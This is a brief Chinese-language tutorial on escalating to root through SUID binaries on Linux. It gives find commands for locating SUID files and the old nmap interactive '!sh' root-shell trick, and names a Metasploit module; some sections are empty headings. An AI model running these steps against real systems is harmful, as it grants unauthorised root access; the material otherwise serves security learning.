0x1 suid概念
通俗理解为其他用户执行这个程序是可以用该程序所有者/组的权限
0x2 suid提权
简单理解为,一个文件有s标志(权限中包含s),并且对应的是root权限,那么当运行这个程序时就有root权限,且这个程序还能执行命令。此时就能从普通用户提升到root权限了。
0x3 常见可用suid提权的命令
0x4 查找特权文件命令
具体来说,这些命令将尝试查找具有root权限的SUID的文件
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
0x5 详细介绍
1 nmap
老版nmap(2.02-5.21)具有交互模式,允许用户执行shell命令。由于Nmap在使用root权限执行的二进制文件列表中,因此可以使用交互式控制台来运行具有相同权限的shell。
交互模式可以通过执行Nmap参数" interactive ": nmap --interactive
以下命令将提供一个提升的shell:
nmap>!sh
sh-3.23#whoami
root
msf中也有相关的模块:exploit/unix/local/setuid_nmap
2 find
如果find以SUID权限运行,所有通过find执行的命令都会以root权限运行。
3 vim
Vim是Linux环境下的一款文件编辑器。如果vim以SUID运行,就会继承root用户的权限,可以读取系统中所有的文件
4 bash
5 less/more
